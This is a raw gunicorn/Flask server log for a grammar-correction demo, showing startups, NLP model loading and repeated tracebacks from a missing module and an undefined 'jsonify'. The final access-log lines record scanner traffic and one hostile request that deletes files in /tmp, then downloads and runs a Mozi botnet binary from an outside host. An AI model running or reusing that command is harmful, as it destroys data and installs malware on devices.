[2020-06-02 10:27:48 +0000] [6437] [INFO] Starting gunicorn 20.0.4
[2020-06-02 10:27:48 +0000] [6437] [INFO] Listening at: http://0.0.0.0:5555 (6437)
[2020-06-02 10:27:48 +0000] [6437] [INFO] Using worker: sync
[2020-06-02 10:27:48 +0000] [6437] [INFO] Server is ready. Spawning workers
[2020-06-02 10:27:48 +0000] [6440] [INFO] Booting worker with pid: 6440
[2020-06-02 10:27:48 +0000] [6440] [INFO] Worker spawned (pid: 6440)
[2020-06-02 10:27:48 +0000] [6442] [INFO] Booting worker with pid: 6442
[2020-06-02 10:27:48 +0000] [6442] [INFO] Worker spawned (pid: 6442)
[2020-06-02 12:10:49 +0000] [12790] [INFO] Starting gunicorn 20.0.4
[2020-06-02 12:10:49 +0000] [12790] [ERROR] Retrying in 1 second.
[2020-06-02 12:10:50 +0000] [12790] [ERROR] Retrying in 1 second.
[2020-06-02 12:10:51 +0000] [12790] [ERROR] Retrying in 1 second.
[2020-06-02 12:10:52 +0000] [12790] [ERROR] Retrying in 1 second.
[2020-06-02 12:10:53 +0000] [12790] [ERROR] Retrying in 1 second.
[2020-06-02 12:10:54 +0000] [12790] [ERROR] Can't connect to ('0.0.0.0', 80)
[2020-06-02 12:11:21 +0000] [12840] [INFO] Starting gunicorn 20.0.4
[2020-06-02 12:11:21 +0000] [12840] [ERROR] Retrying in 1 second.
[2020-06-02 12:11:22 +0000] [12840] [ERROR] Retrying in 1 second.
[2020-06-02 12:11:23 +0000] [12840] [ERROR] Retrying in 1 second.
[2020-06-02 12:11:24 +0000] [12840] [ERROR] Retrying in 1 second.
[2020-06-02 12:11:25 +0000] [12840] [ERROR] Retrying in 1 second.
[2020-06-02 12:11:26 +0000] [12840] [ERROR] Can't connect to ('0.0.0.0', 80)
[2020-06-02 12:24:24 +0000] [13919] [INFO] Starting gunicorn 20.0.4
[2020-06-02 12:24:24 +0000] [13919] [INFO] Listening at: http://0.0.0.0:80 (13919)
[2020-06-02 12:24:24 +0000] [13919] [INFO] Using worker: sync
[2020-06-02 12:24:24 +0000] [13919] [INFO] Server is ready. Spawning workers
[2020-06-02 12:24:24 +0000] [13923] [INFO] Booting worker with pid: 13923
[2020-06-02 12:24:24 +0000] [13923] [INFO] Worker spawned (pid: 13923)
[2020-06-02 12:24:24 +0000] [13925] [INFO] Booting worker with pid: 13925
[2020-06-02 12:24:24 +0000] [13925] [INFO] Worker spawned (pid: 13925)
requirment already installed
requirment already installed
Use device: gpu
---
Loading: tokenize
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_tokenizer.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
---
Loading: lemma
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_lemmatizer.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
Building an attentional Seq2Seq model...
Using a Bi-LSTM encoder
Using soft attention for LSTM.
Finetune all embeddings.
[Running seq2seq lemmatizer with edit classifier]
---
Loading: pos
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_tagger.pt', 'pretrain_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt.pretrain.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
Done loading processors!
---
127.0.0.1 - - [02/Jun/2020:12:29:36 +0000] "POST /corrections HTTP/1.1" 200 55 "-" "curl/7.58.0"
[2020-06-02 12:30:28 +0000] [13919] [INFO] Handling signal: hup
[2020-06-02 12:30:28 +0000] [13919] [INFO] Hang up: Master
[2020-06-02 12:30:28 +0000] [14331] [INFO] Booting worker with pid: 14331
[2020-06-02 12:30:28 +0000] [14331] [INFO] Worker spawned (pid: 14331)
[2020-06-02 12:30:28 +0000] [14332] [INFO] Booting worker with pid: 14332
[2020-06-02 12:30:28 +0000] [14332] [INFO] Worker spawned (pid: 14332)
requirment already installed
requirment already installed
Use device: gpu
---
Loading: tokenize
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_tokenizer.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
---
Loading: lemma
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_lemmatizer.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
Building an attentional Seq2Seq model...
Using a Bi-LSTM encoder
Using soft attention for LSTM.
Finetune all embeddings.
[Running seq2seq lemmatizer with edit classifier]
---
Loading: pos
With settings: 
{'model_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt_tagger.pt', 'pretrain_path': '/home/midas/stanfordnlp_resources/en_ewt_models/en_ewt.pretrain.pt', 'lang': 'en', 'shorthand': 'en_ewt', 'mode': 'predict'}
Done loading processors!
---
127.0.0.1 - - [02/Jun/2020:12:30:55 +0000] "POST /corrections HTTP/1.1" 200 55 "-" "curl/7.68.0"
gunicorn: No such file or directory
[2020-06-02 13:29:45 +0000] [18763] [INFO] Starting gunicorn 20.0.4
[2020-06-02 13:29:45 +0000] [18763] [INFO] Listening at: http://0.0.0.0:80 (18763)
[2020-06-02 13:29:45 +0000] [18763] [INFO] Using worker: sync
[2020-06-02 13:29:45 +0000] [18763] [INFO] Server is ready. Spawning workers
[2020-06-02 13:29:45 +0000] [18767] [INFO] Booting worker with pid: 18767
[2020-06-02 13:29:45 +0000] [18767] [INFO] Worker spawned (pid: 18767)
[2020-06-02 13:29:45 +0000] [18768] [INFO] Booting worker with pid: 18768
[2020-06-02 13:29:45 +0000] [18768] [INFO] Worker spawned (pid: 18768)
[2020-06-02 13:29:45 +0000] [18767] [ERROR] Exception in worker process
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 583, in spawn_worker
    worker.init_process()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/base.py", line 119, in init_process
    self.load_wsgi()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/base.py", line 144, in load_wsgi
    self.wsgi = self.app.wsgi()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/base.py", line 67, in wsgi
    self.callable = self.load()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 49, in load
    return self.load_wsgiapp()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 39, in load_wsgiapp
    return util.import_app(self.app_uri)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/util.py", line 358, in import_app
    mod = importlib.import_module(module)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/midas/benesse-demo/app.py", line 1, in <module>
    from src import app
  File "/home/midas/benesse-demo/src/__init__.py", line 21, in <module>
    from .api import *
  File "/home/midas/benesse-demo/src/api/__init__.py", line 5, in <module>
    from .corrections import *
  File "/home/midas/benesse-demo/src/api/corrections.py", line 5, in <module>
    from src.api.fairsec_gec.interactive_copy import getModel, runInference
ModuleNotFoundError: No module named 'src.api.fairsec_gec'
[2020-06-02 13:29:45 +0000] [18767] [INFO] Worker exiting (pid: 18767)
[2020-06-02 13:29:45 +0000] [18768] [ERROR] Exception in worker process
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 583, in spawn_worker
    worker.init_process()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/base.py", line 119, in init_process
    self.load_wsgi()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/base.py", line 144, in load_wsgi
    self.wsgi = self.app.wsgi()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/base.py", line 67, in wsgi
    self.callable = self.load()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 49, in load
    return self.load_wsgiapp()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 39, in load_wsgiapp
    return util.import_app(self.app_uri)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/util.py", line 358, in import_app
    mod = importlib.import_module(module)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/midas/benesse-demo/app.py", line 1, in <module>
    from src import app
  File "/home/midas/benesse-demo/src/__init__.py", line 21, in <module>
    from .api import *
  File "/home/midas/benesse-demo/src/api/__init__.py", line 5, in <module>
    from .corrections import *
  File "/home/midas/benesse-demo/src/api/corrections.py", line 5, in <module>
    from src.api.fairsec_gec.interactive_copy import getModel, runInference
ModuleNotFoundError: No module named 'src.api.fairsec_gec'
[2020-06-02 13:29:45 +0000] [18768] [INFO] Worker exiting (pid: 18768)
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 209, in run
    self.sleep()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 357, in sleep
    ready = select.select([self.PIPE[0]], [], [], 1.0)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 242, in handle_chld
    self.reap_workers()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 525, in reap_workers
    raise HaltServer(reason, self.WORKER_BOOT_ERROR)
gunicorn.errors.HaltServer: <HaltServer 'Worker failed to boot.' 3>

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/bin/gunicorn", line 11, in <module>
    sys.exit(run())
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 58, in run
    WSGIApplication("%(prog)s [OPTIONS] [APP_MODULE]").run()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/base.py", line 228, in run
    super().run()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/app/base.py", line 72, in run
    Arbiter(self).run()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 229, in run
    self.halt(reason=inst.reason, exit_status=inst.exit_status)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 342, in halt
    self.stop()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 393, in stop
    time.sleep(0.1)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 242, in handle_chld
    self.reap_workers()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/arbiter.py", line 525, in reap_workers
    raise HaltServer(reason, self.WORKER_BOOT_ERROR)
gunicorn.errors.HaltServer: <HaltServer 'Worker failed to boot.' 3>
[2020-06-02 13:57:36 +0000] [21090] [INFO] Starting gunicorn 20.0.4
[2020-06-02 13:57:36 +0000] [21090] [INFO] Listening at: http://0.0.0.0:80 (21090)
[2020-06-02 13:57:36 +0000] [21090] [INFO] Using worker: sync
[2020-06-02 13:57:36 +0000] [21090] [INFO] Server is ready. Spawning workers
[2020-06-02 13:57:36 +0000] [21094] [INFO] Booting worker with pid: 21094
[2020-06-02 13:57:36 +0000] [21094] [INFO] Worker spawned (pid: 21094)
[2020-06-02 13:57:36 +0000] [21095] [INFO] Booting worker with pid: 21095
[2020-06-02 13:57:36 +0000] [21095] [INFO] Worker spawned (pid: 21095)
[2020-06-02 13:59:23 +0000] [21230] [INFO] Starting gunicorn 20.0.4
[2020-06-02 13:59:23 +0000] [21230] [INFO] Listening at: http://0.0.0.0:80 (21230)
[2020-06-02 13:59:23 +0000] [21230] [INFO] Using worker: sync
[2020-06-02 13:59:23 +0000] [21230] [INFO] Server is ready. Spawning workers
[2020-06-02 13:59:23 +0000] [21234] [INFO] Booting worker with pid: 21234
[2020-06-02 13:59:23 +0000] [21234] [INFO] Worker spawned (pid: 21234)
[2020-06-02 13:59:23 +0000] [21235] [INFO] Booting worker with pid: 21235
[2020-06-02 13:59:23 +0000] [21235] [INFO] Worker spawned (pid: 21235)
[2020-06-02 14:00:24,549] ERROR in app: Exception on /corrections [POST]
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
[2020-06-02 14:00:24 +0000] [21235] [ERROR] Error handling request /corrections
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 134, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 175, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1879, in handle_exception
    server_error = handler(server_error)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
127.0.0.1 - - [02/Jun/2020:14:00:24 +0000] "POST /corrections HTTP/1.1" 500 0 "-" "-"
[2020-06-02 14:01:08,392] ERROR in app: Exception on /corrections [POST]
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
[2020-06-02 14:01:08 +0000] [21235] [ERROR] Error handling request /corrections
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 134, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 175, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1879, in handle_exception
    server_error = handler(server_error)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
127.0.0.1 - - [02/Jun/2020:14:01:08 +0000] "POST /corrections HTTP/1.1" 500 0 "-" "-"
[2020-06-02 14:01:30 +0000] [21405] [INFO] Starting gunicorn 20.0.4
[2020-06-02 14:01:30 +0000] [21405] [INFO] Listening at: http://0.0.0.0:80 (21405)
[2020-06-02 14:01:30 +0000] [21405] [INFO] Using worker: sync
[2020-06-02 14:01:30 +0000] [21405] [INFO] Server is ready. Spawning workers
[2020-06-02 14:01:30 +0000] [21409] [INFO] Booting worker with pid: 21409
[2020-06-02 14:01:30 +0000] [21409] [INFO] Worker spawned (pid: 21409)
[2020-06-02 14:01:30 +0000] [21410] [INFO] Booting worker with pid: 21410
[2020-06-02 14:01:30 +0000] [21410] [INFO] Worker spawned (pid: 21410)
[2020-06-02 14:01:36,426] ERROR in app: Exception on /corrections [POST]
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
[2020-06-02 14:01:36 +0000] [21409] [ERROR] Error handling request /corrections
Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1926, in dispatch_request
    self.raise_routing_exception(req)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1908, in raise_routing_exception
    raise request.routing_exception
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/ctx.py", line 350, in match_request
    result = self.url_adapter.match(return_rule=True)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/werkzeug/routing.py", line 1945, in match
    raise NotFound()
werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1816, in handle_user_exception
    return self.handle_http_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1744, in handle_http_exception
    return handler(e)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 134, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/gunicorn/workers/sync.py", line 175, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/home/midas/anaconda3/envs/v4/lib/python3.6/site-packages/flask/app.py", line 1879, in handle_exception
    server_error = handler(server_error)
  File "/home/midas/benesse-demo/src/__init__.py", line 15, in handle_error
    return jsonify(message=error.description, code=error.code)
NameError: name 'jsonify' is not defined
127.0.0.1 - - [02/Jun/2020:14:01:36 +0000] "POST /corrections HTTP/1.1" 500 0 "-" "-"
[2020-06-02 16:45:31 +0000] [33210] [INFO] Starting gunicorn 20.0.4
[2020-06-02 16:45:31 +0000] [33210] [INFO] Listening at: http://0.0.0.0:80 (33210)
[2020-06-02 16:45:31 +0000] [33210] [INFO] Using worker: sync
[2020-06-02 16:45:31 +0000] [33210] [INFO] Server is ready. Spawning workers
[2020-06-02 16:45:31 +0000] [33218] [INFO] Booting worker with pid: 33218
[2020-06-02 16:45:31 +0000] [33218] [INFO] Worker spawned (pid: 33218)
[2020-06-02 16:45:31 +0000] [33219] [INFO] Booting worker with pid: 33219
[2020-06-02 16:45:31 +0000] [33219] [INFO] Worker spawned (pid: 33219)
| [src] dictionary: 49999 types
| [tgt] dictionary: 49999 types
Number of models  1
models_loaded
213.233.179.199 - - [02/Jun/2020:17:05:59 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 zgrab/0.x"
189.69.78.47 - - [02/Jun/2020:17:18:10 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
198.108.66.176 - - [02/Jun/2020:17:52:15 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 zgrab/0.x"
164.68.112.178 - - [02/Jun/2020:18:17:21 +0000] "GET / HTTP/1.0" 200 146 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
[2020-06-02 18:54:07 +0000] [33210] [INFO] Handling signal: hup
[2020-06-02 18:54:07 +0000] [33210] [INFO] Hang up: Master
[2020-06-02 18:54:07 +0000] [41394] [INFO] Booting worker with pid: 41394
[2020-06-02 18:54:07 +0000] [41394] [INFO] Worker spawned (pid: 41394)
[2020-06-02 18:54:07 +0000] [41395] [INFO] Booting worker with pid: 41395
[2020-06-02 18:54:07 +0000] [41395] [INFO] Worker spawned (pid: 41395)
| [src] dictionary: 49999 types
| [tgt] dictionary: 49999 types
Number of models  1
models_loaded
209.17.96.34 - - [02/Jun/2020:21:27:23 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)"
| [src] dictionary: 49999 types
| [tgt] dictionary: 49999 types
Number of models  1
models_loaded
59.3.94.190 - - [02/Jun/2020:22:07:16 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.3.94.190:32845/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 200 146 "-" "Hello, world"
86.109.40.220 - - [02/Jun/2020:22:08:45 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
